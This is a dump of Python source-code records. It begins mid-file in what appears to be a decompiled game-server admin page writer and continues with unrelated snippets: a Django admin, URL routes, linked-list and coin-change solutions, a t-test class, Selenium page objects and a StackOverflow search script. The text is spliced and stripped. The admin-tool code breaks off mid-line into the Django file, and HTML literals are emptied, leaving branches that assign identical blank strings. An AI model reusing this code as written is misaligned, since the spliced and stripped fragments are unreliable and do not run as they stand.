Item', {'action': 'FindItem',\n 'locationID': systemID}))\n if session.role & (ROLE_GMH | ROLE_CONTENT | ROLE_ADMIN) > 0:\n li.append(self.Link('/gd/universe.py', 'Free Slots', {'action': 'FreeSlots',\n 'systemID': systemID}))\n if session.role & ROLE_CONTENT > 0:\n li.append(self.Link('/gd/universe.py', 'Product Distributions', 
{'action': 'ProductDistributions',\n 'systemID': systemID}))\n li.append(self.Link('/info/map.py', 'List Pilots', {'action': 'PilotsInSolarSystem',\n 'solarSystemID': systemID}))\n li.append(self.Link('/info/map.py', 'Map Details', {'action': 'MapDetails',\n 'solarSystemID': systemID}))\n if session.role & ROLE_CONTENT > 0:\n li.append('-')\n editText = self.Link('/gd/universe.py', 'EDIT', {'action': 'SolarSystemEditForm',\n 'solarSystemID': systemID})\n rs = self.DB2.SQLInt('*', 'map.solarSystems', '', '', 'solarSystemID', systemID)\n if len(rs) > 0:\n editText += self.MidDot()\n editText += self.RevisionLink(rs[0])\n li.append(editText)\n li.append('-')\n li.append(self.FontGray('Dungeons and Complexes'))\n li.append('>' + self.Link('/gd/universe.py', 'Dungeons', {'action': 'DungeonList',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Distributions', {'action': 'DungeonDistributions',\n 'solarSystemID': systemID}))\n li.append('>' + self.Link('/gd/universe.py', 'Spawnpoints', {'action': 'Spawnpoints',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Agent Spawnpoints', {'action': 'AgentSpawnpoints',\n 'systemID': systemID}))\n li.append('-')\n li.append(self.FontGray('Cluster'))\n li.append('>' + self.Link('/gd/universe.py', 'Go to System Node', {'action': 'GotoNodeFromSolarSystemID',\n 'solarSystemID': systemID}))\n li.append('>' + self.Link('/admin/network.py', 'Node History', {'action': 'AddressDetails',\n 'serviceID': 2,\n 'addressID': systemID}))\n self.SubjectActions(li, menuPlacement)\n return s\n\n def PlanetHeader(self, planetID, smallHeader = 1, menuPlacement = 'rMenu'):\n p = self.DB2.SQLInt('*', 'map.worldDx', '', '', 'itemID', planetID)[0]\n lines = []\n lines.append([1, 'System', self.SystemLink(p.solarSystemID)])\n lines.append([1, 'Constellation', self.ConstellationLink(p.constellationID)])\n lines.append([1, 'Region', self.RegionLink(p.regionID)])\n self.SubjectHeader(smallHeader, 'PLANET', planetID, p.itemName, '#C0C0C0', '/img/celestial.jpg', '/gd/universe.py', 'Planet', 'planetID', lines)\n li = []\n li.append('#PLANET')\n li.append(self.Link('/gd/universe.py', 'INFO', {'action': 'Planet',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.Link('/gd/universe.py', 'Orbit Celestials', {'action': 'OrbitCelestials',\n 'planetID': planetID}))\n li.append(self.Link('/gd/universe.py', 'Customs Offices', {'action': 'CustomsOffices',\n 'planetID': planetID}))\n li.append(self.Link('/gd/universe.py', 'Resource Distributions', {'action': 'ResourceDistributions',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.FontGray('Planetary Interaction'))\n li.append('>' + self.Link('/gm/planets.py', 'Colonies', {'action': 'Colonies',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.FontGray('Cluster'))\n li.append('>' + self.Link('/gm/planets.py', 'Go to Planet Node', {'action': 'GotoNodeForPlanetID',\n 'planetID': planetID,\n 'redirectAction': 'Planet'}))\n li.append('>' + self.Link('/admin/network.py', 'Node History', {'action': 'AddressDetails',\n 'serviceID': 23,\n 'addressID': planetID}))\n self.SubjectActions(li, menuPlacement)\n return p\n\n def ComboRaces(self, allowNone = 0):\n combo = {}\n if allowNone:\n combo[0] = '(none)'\n for r in cfg.races:\n combo[r.raceID] = r.raceName\n\n return combo\n\n def ComboBloodlines(self, allowNone = 0):\n combo = {}\n if allowNone:\n combo[0] = '(none)'\n for b in self.cache.Rowset(const.cacheChrBloodlines):\n r = cfg.races.Get(b.raceID)\n combo[b.bloodlineID] = 
'%s, %s' % (localization.GetByMessageID(r.raceNameID), localization.GetByMessageID(b.bloodlineNameID))\n\n return combo\n\n def SelectCategory(self, action, categoryID, placement = 'rMenu'):\n categories = []\n for c in cfg.invcategories:\n if c.categoryID > 0:\n bon = ''\n boff = ''\n if c.categoryID == categoryID:\n bon = ''\n boff = ''\n categories.append([c.categoryName, bon + self.Link('', c.categoryName, {'action': action,\n 'categoryID': c.categoryID}) + boff])\n\n categories.sort()\n categories = map(lambda line: line[1:], categories)\n if categoryID is None:\n self.Write(self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n else:\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 1\n\n def SelectCategoryGroup(self, action, categoryID, groupID, placement = 'rMenu', webPart = None):\n if categoryID is None and groupID is not None:\n categoryID = cfg.invgroups.Get(groupID).categoryID\n categories = []\n for c in cfg.invcategories:\n if c.categoryID > 0:\n bon = ''\n boff = ''\n if c.categoryID == categoryID:\n bon = ''\n boff = ''\n categories.append([c.categoryName, bon + self.Link('', c.categoryName, {'action': action,\n 'categoryID': c.categoryID}) + boff])\n\n categories.sort()\n categories = map(lambda line: line[1:], categories)\n if categoryID is None:\n self.Write(self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n else:\n groups = []\n for g in cfg.groupsByCategories.get(categoryID, []):\n bon = ''\n boff = ''\n if g.groupID == groupID:\n bon = ''\n boff = ''\n groups.append([g.groupName, bon + self.Link('', g.groupName, {'action': action,\n 'categoryID': categoryID,\n 'groupID': g.groupID}) + boff])\n\n groups.sort()\n groups = map(lambda line: line[1:], groups)\n if groupID is None:\n self.Write(self.WebPart('Groups', self.GetTable([], groups), 'wpGroups'))\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n if webPart:\n self.WriteDirect(placement, webPart)\n self.WriteDirect(placement, self.WebPart('Groups', self.GetTable([], groups), 'wpGroups'))\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 1\n\n def SelectCategoryGroupType(self, action, categoryID, groupID, placement = 'rMenu'):\n if self.SelectCategoryGroup(action, categoryID, groupID, placement):\n li = []\n for t in cfg.typesByGroups.get(groupID, []):\n li.append([t.typeID, self.Link('', t.typeName, {'action': action,\n 'categoryID': categoryID,\n 'groupID': groupID,\n 'typeID': t.typeID})])\n\n self.LinesSortByLink(li, 1)\n self.Write(self.WebPart('Types', self.GetTable(['id', 'name'], li), 'wpTypes'))\n\n def SelectRegion(self, action, regionID):\n li = []\n for r in self.DB2.SQL('SELECT * FROM map.regionsDx ORDER BY regionName'):\n bon = ''\n boff = ''\n if r.regionID == regionID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(r.regionName, r.regionID), {'action': action,\n 'regionID': r.regionID}) + boff])\n\n regSel = self.GetTable([], li)\n if regionID is None:\n self.Write(self.WebPart('Select Region', regSel, 'wpRegSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Regions', regSel, 'wpRegSel'))\n return 1\n\n def SelectRegionConstellation(self, action, regionID, constellationID):\n if self.SelectRegion(action, regionID):\n li = []\n for c in self.DB2.SQLInt('constellationID, constellationName', 
'map.constellationsDx', '', 'constellationName', 'regionID', regionID):\n bon = ''\n boff = ''\n if c.constellationID == constellationID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(c.constellationName, c.constellationID), {'action': action,\n 'regionID': regionID,\n 'constellationID': c.constellationID}) + boff])\n\n conSel = self.GetTable([], li)\n if constellationID is None:\n self.Write(self.WebPart('Select Constellation', conSel, 'wpConSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Constellations', conSel, 'wpConSel'))\n return 1\n\n def SelectRegionConstellationSolarSystem(self, action, regionID, constellationID, solarSystemID):\n if self.SelectRegionConstellation(action, regionID, constellationID):\n li = []\n for s in self.DB2.SQLInt('solarSystemID, solarSystemName', 'map.solarSystemsDx', '', 'solarSystemName', 'constellationID', constellationID):\n bon = ''\n boff = ''\n if s.solarSystemID == solarSystemID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(s.solarSystemName, s.solarSystemID), {'action': action,\n 'regionID': regionID,\n 'constellationID': constellationID,\n 'solarSystemID': s.solarSystemID}) + boff])\n\n solSel = self.GetTable([], li)\n if solarSystemID is None:\n self.Write(self.WebPart('Select Solar System', solSel, 'wpSolSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Solar Systems', solSel, 'wpSolSel'))\n return 1\n\n def AddTableItem(self, lines, r, owner, location, category = 0, checkBox = 0):\n t = cfg.invtypes.Get(r.typeID)\n g = cfg.invgroups.Get(t.groupID)\n c = cfg.invcategories.Get(g.categoryID)\n cgtn = str(r.typeID) + ': '\n if category:\n if c.categoryName != g.groupName:\n cgtn += c.categoryName + ', '\n if g.groupName == t.typeName:\n cgtn += self.TypeLink(r.typeID, t.typeName)\n else:\n cgtn += g.groupName + ', ' + self.TypeLink(r.typeID, t.typeName)\n itemName = self.SP.EspItemName(0, r.itemID, r.quantity, r.typeID, t.groupID, g.categoryID)\n if itemName != '':\n cgtn += ': ' + itemName + ''\n attr = ''\n if r.quantity < 0:\n attr += ' S'\n if r.quantity != -1:\n attr += self.FontRed(r.quantity)\n else:\n attr += ' %d' % r.quantity\n line = []\n if checkBox == 1:\n line.append('' % r.itemID + ' ' + self.ItemID(r.itemID))\n else:\n line.append(self.ItemID(r.itemID))\n line.append(cgtn)\n if owner:\n ownerName = self.SP.EspItemName(1, r.ownerID)\n if ownerName == '':\n line.append(self.ItemID(r.ownerID))\n else:\n line.append(self.ItemID(r.ownerID) + ': ' + ownerName)\n if location:\n locationName = self.SP.EspItemName(2, r.locationID)\n if locationName == '':\n line.append(self.ItemID(r.locationID))\n else:\n line.append(self.ItemID(r.locationID) + ': ' + locationName)\n line.append('%d: %s' % (r.flagID, self.config.GetFlags(r.flagID).flagName))\n line.append(attr)\n act = ''\n if t.groupID == const.groupCharacter:\n act = self.CharacterLink(r.itemID, 'Character')\n elif t.groupID == const.groupCorporation:\n act = self.CorporationLink(r.itemID, 'Corporation')\n elif t.groupID == const.groupFaction:\n act = self.FactionLink(r.itemID, 'Faction')\n elif t.groupID == const.groupRegion:\n act = self.RegionLink(r.itemID, 'Region')\n elif t.groupID == const.groupConstellation:\n act = self.ConstellationLink(r.itemID, 'Constellation')\n elif t.groupID == const.groupSolarSystem:\n act = self.SystemLink(r.itemID, 'System')\n elif t.groupID == const.groupStation:\n act = self.StationLink(r.itemID, 'Station')\n elif t.groupID == const.groupControlTower:\n act = 
self.Link('/gm/starbase.py', 'Starbase', {'action': 'Starbase',\n 'towerID': r.itemID})\n elif t.groupID == const.groupPlanet:\n act = self.Link('/gd/universe.py', 'Planet', {'action': 'Planet',\n 'planetID': r.itemID})\n elif t.groupID == const.groupAsteroidBelt:\n act = self.Link('/gd/universe.py', 'Belt', {'action': 'AsteroidBelt',\n 'asteroidBeltID': r.itemID})\n line.append(act)\n lines.append(line)\n\n def AddTypeSelector(self, form, name = '', depth = 'type'):\n self.WriteScript('\\n function replaceOptions(sElement, newOptions)\\n {\\n for (i=document.all[sElement].length; i > -1; i--)\\n {\\n document.all[sElement].options[i]=null\\n }\\n for (i = 0; i < newOptions.length; i += 2)\\n {\\n document.all[sElement].add(new Option( newOptions[i], newOptions[i+1]))\\n }\\n }\\n ')\n self.WriteScript('c=new ActiveXObject(\"Scripting.Dictionary\");\\n')\n self.WriteScript('g=new ActiveXObject(\"Scripting.Dictionary\");\\n')\n s = htmlwriter.UnicodeMemStream()\n for g in cfg.invgroups:\n self.BeNice()\n if g.groupID not in cfg.typesByGroups:\n continue\n typesByGroup = cfg.typesByGroups[g.groupID].Copy()\n typesByGroup.Sort('typeName')\n s.Write('g.Add(\"%d\", new Array(' % g.groupID)\n for t in typesByGroup:\n self.BeNice()\n typeName = t.typeName.replace('\"', \"'\")\n typeName = typeName.replace('\\n', '')\n typeName = typeName.replace('\\r', '')\n s.Write('\"%s\",%d,' % (str(typeName), t.typeID))\n\n s.Seek(s.pos - 1)\n s.Write('));\\n')\n\n cic = {}\n for c in cfg.invcategories:\n self.BeNice()\n if c.categoryID not in cfg.groupsByCategories:\n continue\n groupsByCategory = cfg.groupsByCategories[c.categoryID].Copy()\n groupsByCategory.Sort('groupName')\n cic[c.categoryID] = c.name\n s.Write('c.Add(\"%d\", new Array(' % c.categoryID)\n for g in groupsByCategory:\n self.BeNice()\n s.Write('\"%s\",%d,' % (str(g.groupName.replace('\"', \"'\")), g.groupID))\n\n s.Seek(s.pos - 1)\n s.Write('));\\n')\n\n s.Seek(0)\n self.WriteScript(str(s.Read()))\n form.AddSelect(name + 'categoryid', cic, 'Category', None, 0, 'onChange=\"replaceOptions(\\'' + name + \"groupid',c(this.options[this.selectedIndex].value)); replaceOptions('\" + name + \"typeid',g(document.all['\" + name + 'groupid\\'].options[0].value))\"')\n if depth == 'type' or depth == 'group':\n form.AddSelect(name + 'groupid', {}, 'Group', None, 0, 'onChange=\"replaceOptions(\\'' + name + 'typeid\\',g(this.options[this.selectedIndex].value))\"')\n if depth == 'type':\n form.AddSelect(name + 'typeid', {}, 'Type')\n\n def QuickLinks(self, text):\n pup = re.compile('charid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('userid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('itemid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('petid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n return text\n\n def GetOwnerImage(self, ownerType, ownerID, width = 128):\n if ownerType == 'Character':\n extension = 'jpg'\n else:\n extension = 'png'\n serverLink = sm.GetService('machoNet').GetGlobalConfig().get('imageserverurl')\n if serverLink == '':\n return\n if serverLink is None:\n serverLink = 'http://%s.dev.image/' % os.environ.get('USERNAME').replace('.', '_').lower()\n serverLink += '%s/%d_%d.%s'\n return serverLink % (ownerType,\n ownerID,\n width,\n extension)\n\n def GetTransferDelay(self):\n transferDelay = self.cache.Setting('Character', 'TransferDelay')\n if transferDelay == '':\n return 10\n return 
int(transferDelay)\n\n def GetTransferQueue(self, transferQueue, displayLastEmailChange = False, displayLastPasswordChange = False):\n transferDelay = self.GetTransferDelay()\n header = ['Character',\n 'Old User',\n 'New User',\n 'IP Number',\n 'IP Info',\n 'Transfer Requested',\n 'Transfer Delay Ends']\n if displayLastEmailChange:\n header.append('Old User Email Changed (last 7d)')\n if displayLastPasswordChange:\n header.append('Old User Password Changed (last 7d)')\n lines = []\n for item in transferQueue:\n line = [self.CharacterLink(item.characterID),\n '%s (%s)' % (self.UserLink(item.oldUserID), item.oldUserCountryCode),\n '%s (%s)' % (self.UserLink(item.newUserID), item.newUserCountryCode),\n item.ipNumber,\n self.IPAddress(item.ipNumber),\n util.FmtDate(item.created, 'll'),\n util.FmtDate(item.created + transferDelay * HOUR)]\n if displayLastPasswordChange or displayLastEmailChange:\n SQL = '\\n SELECT count=COUNT(*), columnID\\n FROM (SELECT TOP 100 eventDate, columnID\\n FROM zuser.userEvents\\n WHERE userID = %i\\n ORDER BY eventID DESC) AS RES\\n WHERE eventDate > GETUTCDATE() - 7 AND columnID in (205, 206)\\n GROUP BY columnID'\n displayLastEmailChangeText = ''\n displayLastPasswordChangeText = ''\n for row in self.DB2.SQL(SQL % item.oldUserID):\n if row.columnID == 205:\n displayLastEmailChangeText = 'Yes (%i)' % row.count\n if row.columnID == 206:\n displayLastPasswordChangeText = 'Yes (%i)' % row.count\n\n if displayLastEmailChange:\n line.append(displayLastEmailChangeText)\n if displayLastPasswordChange:\n line.append(displayLastPasswordChangeText)\n lines.append(line)\n\n return self.GetTable(header, lines, useFilter=True)\n\n def GetPickerAgent(self, ctrlID, ctrlLabel = None, minLength = 4):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/agentds.py', minLength=minLength)\n\n def GetPickerType(self, ctrlID, ctrlLabel = None, minLength = 4):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/typeds.py', minLength=minLength)\n\n def GetPickerCharacter(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/characterds.py', minLength=minLength)\n\n def GetPickerOAuthApplication(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/oauthAppds.py', minLength=minLength)\n\n def GetPickerAffiliate(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/affiliateds.py', minLength=minLength)\n\n def GetPickerStation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/stationds.py', minLength=minLength)\n\n def GetPickerCorporation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/corporationds.py', minLength=minLength)\n\n def GetPickerRegion(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return 
self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/regionds.py', minLength=minLength)\n\n def GetPickerConstellation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/constellationds.py', minLength=minLength)\n\n def GetPickerSolarSystem(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/solarsystemds.py', minLength=minLength)\n\n def GetPickerDistrict(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/districtds.py', minLength=minLength)\n\n def AppGetAwayStatusTextForCharacter(self, characterID):\n if not characterID:\n return ''\n try:\n afkStatus = ''\n charMod = characterID % const.CHARNODE_MOD\n charNodeID = sm.GetService('machoNet').GetNodeFromAddress(const.cluster.SERVICE_CHARACTER, charMod)\n afkTime = self.session.ConnectToRemoteService('charMgr', charNodeID).IsCharacterAFK(characterID)\n if afkTime:\n diff = blue.os.GetWallclockTime() - afkTime\n afkStatus = ' · Away for %s, since %s' % (util.FmtTimeEng(diff), util.FmtDateEng(afkTime, 'ns'))\n except Exception as e:\n afkStatus = 'Error: %s' % e\n\n return afkStatus\n\n\nif macho.mode == 'server':\n\n class MlsHtmlWriter(ESPHtmlWriter):\n __guid__ = 'htmlwriter.MlsHtmlWriter'\n\n def __init__(self, template = 'script:/wwwroot/lib/template/baseNoRight.html', page = ''):\n ESPHtmlWriter.__init__(self, template, 'MLS', page)\n\n\n class GMHtmlWriter(ESPHtmlWriter):\n __guid__ = 'htmlwriter.GMHtmlWriter'\n\n def __init__(self, template = 'script:/wwwroot/lib/template/base.html', page = ''):\n ESPHtmlWriter.__init__(self, template, 'GM', page)\n\n def WriteLeftMenu(self, action):\n pass\n\n def WriteRightMenu(self):\n pass\n\n def CategorySelector(self, selectName, selectedCategoryID = None, submitOnChange = False):\n categories = []\n parents, childs, descriptions, billinCategories = self.petitioner.GetCategoryHierarchicalInfo()\n for parentID in parents:\n categories.append([parentID, parents[parentID], True])\n for childID in childs[parentID]:\n categories.append([childID, childs[parentID][childID], False])\n\n selectorHTML = ''.format(obj.pk))\n\n delete.allow_tags = True\n delete.short_description ='Delete Profolio'\n def image_tag(self,obj):\n if obj.get_image_video() =='mp4':\n return format_html(f'''\n \n ''')\n else:\n return format_html(f'\"alt\"')\n \n image_tag.allow_tags = True\n image_tag.short_description = 'Image / Video'\n list_per_page = 10\n search_fields = (\"title\",\"technology\")\n list_display = (\"title\",\"technology\",\"image_tag\",\"uploaded_at\",\"delete\")\n list_editable = (\"technology\",)\n\n\nadmin.site.register(Portfolio,PortfolioAdmin)\nadmin.site.register(Career)\nadmin.site.site_header = \"Vcodify Admin Dashboard\"\nadmin.site.site_title = \"Vcodify Admin Dashboard\"\nadmin.site.index_title = \"Welcome to Vcodify Admin Dashboard\"","repo_name":"mapplecode/vcodify","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13962841024","text":"from django.conf.urls import url\nimport views\n\nurlpatterns=[\n\turl(r'^$', views.courses),\n\turl(r'^create$', 
views.create),\n\turl(r'^destory/(?P\\d+)$', views.confirm),\n\turl(r'^destory/(?P\\d+)/remove$', views.remove),\n url(r'^(?P\\d+)/comments$', views.comments),\n\turl(r'^(?P\\d+)/comments/create$', views.create_comments),\n]","repo_name":"arsiag/Django-Courses","sub_path":"apps/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32178504212","text":"# Given the head of a singly linked list and two integers left and right where left <= right,\n# reverse the nodes of the list from position left to position right, and return the reversed list.\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseBetween(self, head, left, right):\n dummy = ListNode(0)\n dummy.next = head\n\n prev = dummy\n curr = dummy.next\n for i in range(1, left):\n prev = curr\n curr = curr.next\n\n for i in range(right - left):\n temp = curr.next\n curr.next = temp.next\n temp.next = prev.next\n prev.next = temp\n return dummy.next\n","repo_name":"tharun-vemula/programming","sub_path":"Problems/ReverseLinkedList.py","file_name":"ReverseLinkedList.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744549328","text":"# Given a 32-bit signed integer, reverse digits of an integer.\n\nclass Solution:\n def reverse(self, x: int) -> int:\n if x>0:\n a = int(str(x)[::-1])\n if x<=0: \n a = -1*int(str(x*-1)[::-1])\n \n if a in range(-2**31, (2**31)-1):\n return a\n else:\n return 0\n ","repo_name":"vatsaashwin/Algorithms","sub_path":"reverseInt.py","file_name":"reverseInt.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32841904115","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom scipy import stats\n\nclass Ttest1():\n \"\"\"\n pairwise t-test without any corrections\n first argument is the dataframe with MultiIndex and values to test\n 'gbg': name of groupby column\n 'cpg': name of column to contain groups to be compared with its first group value\n 'value': name of column containing the values to be compared\n 'ctrl': group value in cpg used as control group when doing pairwise comparison\n return 'pvalue', 'psign'\n 'pvalue': dataframe containing p-value from pairwise t-test\n 'psign': convert 'pvalue' dataframe to a new dataframe with '*'\n '': >= 0.05, '*': <0.05>=0.01, '**': <0.01>=0.001, '***': <0.001>=0.0001, '****': <0.0001\n \"\"\"\n \n def __init__(self, df, value):\n self.df = df\n self.value = value\n\n def onetotwo(self, df):\n df1 = df.reset_index(level=['Grp', 'Sample'])\n df1['Grp1'] = df1['Grp'].apply(lambda x: x.split()[1])\n df1['Grp2'] = df1['Grp'].apply(lambda x: x.split()[0])\n df1 = df1.drop('Grp', axis=1)\n df1 = df1.set_index(['Grp1', 'Grp2', 'Sample'], append=True)\n return df1\n\n def ttest_1(self, gbg='Condi', cpg='Treat', ctrl='control'):\n df1 = self.onetotwo(self.df).reset_index([gbg, cpg])\n group1 = list(set(df1[gbg]))\n group2 = list(set(df1[cpg]))\n tt2 = np.ones((len(group1), len(group2)))\n pv2 = np.ones((len(group1), len(group2)))\n for i, g1 in enumerate(group1):\n group = df1[(df1[gbg]==g1)]\n for j, g2 in enumerate(group2):\n tt2[i,j], pv2[i, j] = 
stats.ttest_ind(group[self.value][group[cpg]==ctrl], group[self.value][group[cpg]==g2])\n \n pv3 = pd.DataFrame(pv2, index=group1, columns=group2)\n \n ps = range(len(pv3))\n\n for m in list(np.arange(len(pv3))):\n ps[m] = Series(pd.cut(pv3.ix[m, :], [0, 0.0001, 0.001, 0.01, 0.05, 1], right=False, labels=['****', '***', '**', '*', '']))\n\n psign = pd.DataFrame(ps)\n psign.index = group1\n psign.columns = group2\n\n pvalue = pv3.copy()\n\n return pvalue, psign\n","repo_name":"josephyan123/quantitative-gene-expression","sub_path":"ttest/ttest1.py","file_name":"ttest1.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2813291547","text":"from selenium.webdriver.common.by import By\nfrom seleniumbase import BaseCase\n\nfrom tests.end2end.helpers.screens.document.form_edit_grammar import (\n Form_EditGrammar,\n)\nfrom tests.end2end.helpers.screens.screen import Screen\n\n\nclass Screen_Document(Screen): # pylint: disable=invalid-name\n def __init__(self, test_case: BaseCase) -> None:\n assert isinstance(test_case, BaseCase)\n super().__init__(test_case)\n\n # overridden for Screen_Document\n\n def assert_on_screen_document(self) -> None:\n super().assert_on_screen(\"document\")\n\n def assert_empty_document(self) -> None:\n super().assert_empty_view(\"document-root-placeholder\")\n\n def assert_not_empty_document(self) -> None:\n super().assert_not_empty_view(\"document-root-placeholder\")\n\n # Actions on the page\n\n def do_export_reqif(self) -> None:\n self.test_case.click_xpath(\n '(//*[@data-testid=\"document-export-reqif-action\"])'\n )\n\n # Open forms\n\n def do_open_modal_form_edit_grammar(self) -> Form_EditGrammar:\n self.test_case.assert_element_not_present(\"//sdoc-modal\", by=By.XPATH)\n self.test_case.click_xpath(\n '(//*[@data-testid=\"document-edit-grammar-action\"])'\n )\n self.test_case.assert_element(\n \"//sdoc-modal\",\n by=By.XPATH,\n )\n return Form_EditGrammar(self.test_case)\n","repo_name":"strictdoc-project/strictdoc","sub_path":"tests/end2end/helpers/screens/document/screen_document.py","file_name":"screen_document.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"32"} +{"seq_id":"7440957723","text":"#Created by kenneth Zeng \n#the purpos of these code is for quick study for prepaing interview or catch up for job or refresh memory. 
sometime, easy code is fast to catch up \n#method overloading; double check with other lanague like java and c\n#sum(a, b) \n#sume(a, b,c) or more parameter\n\n\nclass Student:\n\n def __init__(self, m1, m2):\n self.m1= m1\n self.m2 = m2 \n\n\n def sum(self, a=None,b=None, c=None):\n if a != None and b != None and c != None:\n s = a + b + c\n elif a != None and b != None:\n s = a +b \n elif a != None: \n s = a\n return s\n\n\n\n\ns1 = Student(58,59)\n\nprint(s1.sum(6, 9)) #15\nprint(s1.sum(5)) #5\nprint(s1.sum(6,7, 5)) #18","repo_name":"kennethyzeng/pythonByTopics_N_SmallProjects","sub_path":"A001_OOP/polymorphism_methodOverloading.py","file_name":"polymorphism_methodOverloading.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38111242898","text":"# Time complexity: O(m*n)\n# Space complexity:O(m*n)\n# m is the length of coins\n# n is the amount\n\nclass Solution:\n def change(self, amount: int, coins: List[int]) -> int:\n rows = len(coins) + 1\n columns = amount + 1\n \n dp = [[0 for j in range(amount + 1)] for i in range(len(coins) + 1)]\n \n for i in range(len(dp)):\n dp[i][0] = 1\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n \n if j < coins[i-1]:\n # till we have not reached the denomination of the coin\n dp[i][j] = dp[i-1][j]\n \n else:\n dp[i][j] = dp[i-1][j] + dp[i][j - coins[i-1]]\n \n return dp[len(dp) - 1][len(dp[0]) - 1]","repo_name":"sahilshembekar/LeetCode-Problems","sub_path":"518-Coin-Change-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44157647177","text":"#!/usr/bin/python3\n\nfrom googlesearch import search\nimport re\nfrom stackapi import StackAPI\n\nquery=input('enter you want to search')\ndata=search(query+' stackoverflow',num=10,tld=\"com\",stop=10)\nquestions=[]\nfor url in data:\n\tif re.search('stackoverflow.com',url)!=None:\n\t\tquestions.append(url)\nquestions_ids=[]\nfor url in questions:\n\tq_id=url.split('/')[4]\n\tquestions_ids.append(q_id)\n\t\nsite = StackAPI('stackoverflow')\nans_list=[]\nlength=len(questions_ids)\nall_answers=site.fetch('questions/{ids}/answers',filter='!9Z(-wzftf',ids=questions_ids)\nitems=all_answers['items']\nfor answer in items:\n\tif answer['is_accepted']==True:\n\t\tans_list.append(answer['body_markdown'])\nfor i in 